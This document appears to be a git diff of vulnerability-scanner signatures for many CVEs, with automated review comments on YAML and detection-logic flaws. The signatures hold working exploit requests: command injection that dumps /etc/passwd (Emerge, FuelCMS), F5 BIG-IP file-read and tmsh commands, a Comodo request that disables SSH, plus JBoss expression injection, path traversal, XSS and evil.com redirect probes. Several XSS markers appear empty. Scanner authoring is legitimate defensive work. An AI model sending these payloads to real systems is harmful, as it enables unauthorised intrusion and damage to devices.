diff --git a/cves/comodo-utmc-rce-cve-2018-17431.yaml b/cves/comodo-utmc-rce-cve-2018-17431.yaml
index 850a267..9e1d118 100644
--- a/cves/comodo-utmc-rce-cve-2018-17431.yaml
+++ b/cves/comodo-utmc-rce-cve-2018-17431.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}u?s==5&w=218&h=15&k=%0a&l=62&_=5621298674064
+ {{.root}}/{{.endpoint}}u?s==5&w=218&h=15&k=%0a&l=62&_=5621298674064
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -20,7 +20,7 @@ requests:
StatusCode() == 200 && StringSearch("resBody", "Configuration has been altered")
- method: GET
url: >-
- {{.root}}{{.endpoint}}u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
+ {{.root}}/{{.endpoint}}u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
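Review bot: The second request on L601 does not read like a read-only probe: `k=` carries a percent-encoded value containing `%0a` line breaks and the signature's own success string on L597 is `Configuration has been altered`, so running this signature appears to change state on the scanned device. Signatures that modify the target should say so where operators will see it, e.g. a comment above the request such as `# NOTE: this request alters device configuration; not safe for blind scanning`, so it can be excluded from routine scans. cves/emerge-rce-cve-2019-7256.yaml has the same property: L639 writes an artifact (`cvebase.txt`) on the target that L648 then fetches, and nothing in the signature removes it afterwards.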
diff --git a/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml
index 48e78d2..3613f65 100644
--- a/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml
+++ b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}/etc/passwd
+ {{.root}}/{{.endpoint}}/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/emerge-rce-cve-2019-7256.yaml b/cves/emerge-rce-cve-2019-7256.yaml
index 0541db7..b0bf0bb 100644
--- a/cves/emerge-rce-cve-2019-7256.yaml
+++ b/cves/emerge-rce-cve-2019-7256.yaml
@@ -4,13 +4,12 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
-
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20cvebase.txt%60
+ {{.root}}/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20cvebase.txt%60
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -18,7 +17,7 @@ requests:
StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
- method: GET
url: >-
- {{.root}}cvebase.txt
+ {{.root}}/cvebase.txt
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/exacqvision-web-service-rce-cve-2020-9047.yaml b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml
index f6f0231..3ca9dff 100644
--- a/cves/exacqvision-web-service-rce-cve-2020-9047.yaml
+++ b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml
@@ -4,13 +4,13 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}version.web
+ {{.root}}/version.web
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/f5-bigip-rce-cve-2020-5902.yaml b/cves/f5-bigip-rce-cve-2020-5902.yaml
index 092fc01..3dd487e 100644
--- a/cves/f5-bigip-rce-cve-2020-5902.yaml
+++ b/cves/f5-bigip-rce-cve-2020-5902.yaml
@@ -4,13 +4,13 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
redirect: false
url: >-
- {{.root}}tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
+ {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -20,7 +20,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
+ {{.root}}//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml
index 2dd5bf6..fb2c4a2 100644
--- a/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml
+++ b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml
@@ -10,7 +10,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
+ {{.root}}//remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
@@ -19,7 +19,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/message?title=x&msg=%26%23;
+ {{.root}}//message?title=x&msg=%26%23;
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
@@ -28,7 +28,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+ {{.root}}//remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/fuelcms-rce-cve-2018-16763.yaml b/cves/fuelcms-rce-cve-2018-16763.yaml
index 2fce8b6..87231cc 100644
--- a/cves/fuelcms-rce-cve-2018-16763.yaml
+++ b/cves/fuelcms-rce-cve-2018-16763.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,11 +12,12 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
+ {{.root}}/{{.endpoint}}?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+
references:
- https://www.cvebase.com/cve/2018/16763
diff --git a/cves/glpi-open-redirect-cve-2020-11034.yaml b/cves/glpi-open-redirect-cve-2020-11034.yaml
index fc909bb..554ae05 100644
--- a/cves/glpi-open-redirect-cve-2020-11034.yaml
+++ b/cves/glpi-open-redirect-cve-2020-11034.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,8 +12,8 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?redirect=/\/evil.com/
- {{.root}}{{.endpoint}}?redirect=//evil.com
+ {{.root}}/{{.endpoint}}?redirect=/\/evil.com/
+ {{.root}}/{{.endpoint}}?redirect=//evil.com
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
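Review bot: The `url` on L771–L772 is a `>-` folded scalar with two lines, so YAML joins them with a space and the request URL becomes `…?redirect=/\/evil.com/ {{.root}}/{{.endpoint}}?redirect=//evil.com` as one string. Unless Jaeles splits the url on whitespace, only a malformed request is sent; if two variants are intended, put them in a `|` literal variable and reference it, or write two request entries. The grafana-dos signature in this same commit (L835–L837) collapsed an identical two-line `>-` url to a single line, which suggests the pattern is already known to be a problem.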
diff --git a/cves/grafana-api-improper-authorization-cve-2019-15043.yaml b/cves/grafana-api-improper-authorization-cve-2019-15043.yaml
index 4cd6e03..f183175 100644
--- a/cves/grafana-api-improper-authorization-cve-2019-15043.yaml
+++ b/cves/grafana-api-improper-authorization-cve-2019-15043.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,15 +12,16 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/json
- - Host: '{{Hostname}}'
- body: >-
+ - Host: '{{.Host}}'
+ body: |
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":3600}
detections:
- >-
StringSearch("resBody", 'deleteKey')
+
references:
- https://www.cvebase.com/cve/2019/15403
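Review bot: The reference link on L806 points at `cve/2019/15403` while the file is cves/grafana-api-improper-authorization-cve-2019-15043.yaml; the digits look transposed, so please confirm the link and make it match the id. The `endpoint` variable the url on L792 expands starts in the previous hunk, outside this one.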
diff --git a/cves/grafana-dos-cve-2020-13379.yaml b/cves/grafana-dos-cve-2020-13379.yaml
index 53a783c..e4b3458 100644
--- a/cves/grafana-dos-cve-2020-13379.yaml
+++ b/cves/grafana-dos-cve-2020-13379.yaml
@@ -1,21 +1,32 @@
id: CVE-2020-13379
info:
- name: Grafana DoS
+ name: Grafana DoS Probing
risk: High
params:
- - root: '{{.BaseURL}}/'
-
+ - root: '{{.BaseURL}}'
+
+variables:
+ - endpoint: |
+ /
+ /grafana/
+ /debug/grafana/
+ /-/grafana/
+ /gitlab/-/grafana/
+ /-/debug/grafana/
+
requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
- {{.root}}
+ {{.root}}{{.endpoint}}avatar/120
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 502
+ StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: image/jpeg") && StringSearch("body", "IEND") && StringSearch("body", "PNG")
references:
- https://www.cvebase.com/cve/2020/13379
+ - note: |
+ Patched instance will show 404 code. Real DoS POC is http://target.com/avatar/%25anything
\ No newline at end of file
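Review bot: The new detection requires `Content-Type: image/jpeg` in the response headers but then searches the body for the PNG signature (`PNG`) and the PNG `IEND` chunk; a JPEG body carries neither, so as written the expression can only match a PNG served under a JPEG content-type. Unless that mismatch is the intended fingerprint, align the two halves, e.g. `StatusCode() == 200 && StringSearch("resHeaders", "image/png") && StringSearch("body", "IEND")`, and say in a comment above the detection which of the two the unpatched endpoint actually returns. `references` now also mixes a plain URL item with a `- note:` mapping item, and the file lost its final newline; sibling signatures keep `references` as a list of strings, so the note would sit better as a comment or in `info`.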
diff --git a/cves/graphql-playround-xss-cve-2020-4038.yaml b/cves/graphql-playround-xss-cve-2020-4038.yaml
index 7169c4b..334c38a 100644
--- a/cves/graphql-playround-xss-cve-2020-4038.yaml
+++ b/cves/graphql-playround-xss-cve-2020-4038.yaml
@@ -25,7 +25,7 @@ requests:
{{.root}}{{.graph}}{{.xss}}
detections:
- >-
- StatusCode() == 200 && StringSearch("body", '')
+ StatusCode() == 200 && StringSearch("resHeaders", "text/html") && StringSearch("body", '')
references:
- link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf
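Review bot: The added `text/html` header check is sound, but `StringSearch("body", '')` on the new detection line has an empty needle; if the committed file really carries an empty string (rather than markup lost in rendering), every 200 text/html response satisfies the expression and the signature reports an XSS on any HTML page. Pin the search to the marker the request actually sends so the detection depends on the response, e.g. `StringSearch("body", '<reflected marker from the request — placeholder>')`. The same empty-needle `StringSearch` appears in icewarp-webmail-xss, jira-path-traversal, jira-xss-cve-2020-9344 and jolokia-xss and needs the same treatment there. The request's `root` parameter is defined above this hunk, so it is not visible whether this file's `root` also lost its trailing slash; `{{.root}}{{.graph}}{{.xss}}` has no separator of its own, so `{{.graph}}` must start with `/` if it did.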
diff --git a/cves/icewarp-lfi-cve-2019-12593.yaml b/cves/icewarp-lfi-cve-2019-12593.yaml
index 5ba035e..08514bc 100644
--- a/cves/icewarp-lfi-cve-2019-12593.yaml
+++ b/cves/icewarp-lfi-cve-2019-12593.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
+ {{.root}}/{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -20,7 +20,7 @@ requests:
StatusCode() == 200 && StringSearch("resBody", "[intl]")
- method: GET
url: >-
- {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
+ {{.root}}/{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/icewarp-webmail-xss-cve-2020-8512.yaml b/cves/icewarp-webmail-xss-cve-2020-8512.yaml
index cb0ddf7..ab97c4a 100644
--- a/cves/icewarp-webmail-xss-cve-2020-8512.yaml
+++ b/cves/icewarp-webmail-xss-cve-2020-8512.yaml
@@ -4,18 +4,18 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
+ {{.root}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "")
+ StatusCode() == 200 && StringSearch("body", "IceWarp WebClient") && StringSearch("body", "")
references:
- https://www.cvebase.com/cve/2020/8512
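Review bot: The context line `variables:` carries no value, so it parses as `variables: null` rather than an empty section; the signature presumably only works because the loader tolerates a null there. Since this file defines no variables, drop the key or write `variables: []` so the document also passes a strict schema or yamllint's `empty-values` check. infinitewp-improper-authentication has the same bare `variables:` line.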
diff --git a/cves/imind-server-info-leak-cve-2020-24765.yaml b/cves/imind-server-info-leak-cve-2020-24765.yaml
index 0c1902b..e7c135f 100644
--- a/cves/imind-server-info-leak-cve-2020-24765.yaml
+++ b/cves/imind-server-info-leak-cve-2020-24765.yaml
@@ -4,12 +4,12 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1
+ {{.root}}/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/infinitewp-improper-authentication-cve-2020-8772.yaml b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml
index 877aac2..1962bd1 100644
--- a/cves/infinitewp-improper-authentication-cve-2020-8772.yaml
+++ b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml
@@ -4,16 +4,17 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: POST
url: >-
- {{.root}}wp-admin/
+ {{.root}}/wp-admin/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- body: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
+ body: |
+ _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
detections:
- >-
StringSearch("resHeaders", "IWPHEADER")
diff --git a/cves/jboss-seam-code-execution-cve-2010-1871.yaml b/cves/jboss-seam-code-execution-cve-2010-1871.yaml
index 850650e..1ea5190 100644
--- a/cves/jboss-seam-code-execution-cve-2010-1871.yaml
+++ b/cves/jboss-seam-code-execution-cve-2010-1871.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]}
+ {{.root}}/{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jenkins-gitlab-xss-cve-2020-2096.yaml b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml
index a886c56..e41a0ad 100644
--- a/cves/jenkins-gitlab-xss-cve-2020-2096.yaml
+++ b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml
@@ -4,19 +4,28 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- gitlab/
-requests:
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}build_now%3Csvg/onload=alert(1337)%3E
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ {{.root}}/gitlab/build_now/a'">
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "")
+ StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")
+ - >-
+ StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook")
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}/git/build_now/a'">
+ detections:
+ - >-
+ StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")
+ - >-
+ StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook")
+
references:
- - https://www.cvebase.com/cve/2020/2096
+ - author: j3ssie
+ - link: https://www.cvebase.com/cve/2020/2096
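Review bot: The first detection of each new request (`StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")`) fires on the plugin's generic error text with no status code and no check that the request's own marker came back, so — assuming each entry in `detections` counts on its own — it reports a finding whenever the GitLab hook plugin is installed, not when anything is reflected; the second entry already carries the `Gitlab Web Hook` marker, so either drop the first or combine the error text with the reflected value. The two requests differ only in the `/gitlab/` versus `/git/` path segment, which is exactly what the removed `endpoint` variable expressed; restoring it with those two entries and keeping a single request avoids maintaining two copies of the same detection pair. The `references` entries also switch to `- author:` / `- link:` mappings while the sibling files in this commit keep plain URL strings.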
diff --git a/cves/jenkins-xss-cve-2019-10475.yaml b/cves/jenkins-xss-cve-2019-10475.yaml
index 0c67572..d8486a9 100644
--- a/cves/jenkins-xss-cve-2019-10475.yaml
+++ b/cves/jenkins-xss-cve-2019-10475.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -14,7 +14,7 @@ requests:
- method: GET
redirect: true
url: >-
- {{.root}}{{.endpoint}}?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
+ {{.root}}/{{.endpoint}}?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -23,14 +23,14 @@ requests:
- method: GET
redirect: true
url: >-
- {{.BaseURL}}{{.endpoint}}?label=reallylongtring
+ {{.root}}/{{.endpoint}}?label=reallylongtring
detections:
- >-
StatusCode() == 200 && StringSearch("response", "reallylongtring")
- method: GET
redirect: true
url: >-
- {{.BaseURL}}{{.endpoint}}?label=reallylongtring
+ {{.root}}/{{.endpoint}}?label=reallylongtring
detections:
- >-
StatusCode() == 200 && StringSearch("response", "reallylongtring")
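Review bot: The third request in this hunk is a byte-for-byte copy of the second (same `{{.root}}/{{.endpoint}}?label=reallylongtring` URL, same `redirect: true`, same detection), so it doubles the traffic sent to every target for no additional signal; drop one of them. The marker `reallylongtring` is spelled the same in URL and detection, so it works, but if it was meant to read `reallylongstring` this is the moment to fix both sides together.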
diff --git a/cves/jenkins-xss-cve-2020-2140.yaml b/cves/jenkins-xss-cve-2020-2140.yaml
index bb3f180..57a22e7 100644
--- a/cves/jenkins-xss-cve-2020-2140.yaml
+++ b/cves/jenkins-xss-cve-2020-2140.yaml
@@ -4,20 +4,22 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
-
-variables:
- - endpoint: |
- descriptorByName/AuditTrailPlugin/regexCheck
- jenkins/descriptorByName/AuditTrailPlugin/regexCheck
-requests:
+ - root: "{{.BaseURL}}"
+
+replicate:
+ ports: '8080'
+ prefixes: 'jenkins'
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}?value=*j%3Ch1%3Esample
+ {{.root}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*jsample
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "sample")
+ StatusCode() == 200 && StringSearch("response", "sample") && StringSearch("response", "regular expression")
+
references:
- https://www.cvebase.com/cve/2020/2140
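Review bot: The new `root` line uses double quotes (`- root: "{{.BaseURL}}"`) while every other signature touched by this commit writes `- root: '{{.BaseURL}}'` and the `replicate` values directly below are single-quoted; the template braces need no escape processing, so `'{{.BaseURL}}'` keeps the file consistent with its siblings. kibana-timelion-code-execution introduces the same double-quoted `root`. Quoting `ports: '8080'` is right, since it keeps a numeric-looking value from being retyped by the parser, so leave that as is.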
diff --git a/cves/jenkins-xss-cve-2020-2199.yaml b/cves/jenkins-xss-cve-2020-2199.yaml
index 3771a94..1b2836b 100644
--- a/cves/jenkins-xss-cve-2020-2199.yaml
+++ b/cves/jenkins-xss-cve-2020-2199.yaml
@@ -6,15 +6,15 @@ info:
params:
- root: "{{.BaseURL}}"
-variables:
- - file: |
- /
- /jenkins/
+replicate:
+ ports: '8080'
+ prefixes: 'jenkins'
+
requests:
- method: GET
redirect: false
url: >-
- {{.root}}{{.file}}scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie
+ {{.root}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/jira-improper-authorization-cve-2019-8446.yaml b/cves/jira-improper-authorization-cve-2019-8446.yaml
index 8a64643..24aabc9 100644
--- a/cves/jira-improper-authorization-cve-2019-8446.yaml
+++ b/cves/jira-improper-authorization-cve-2019-8446.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,18 +12,16 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Connection: Close
- - Sec-Fetch-User: ?1
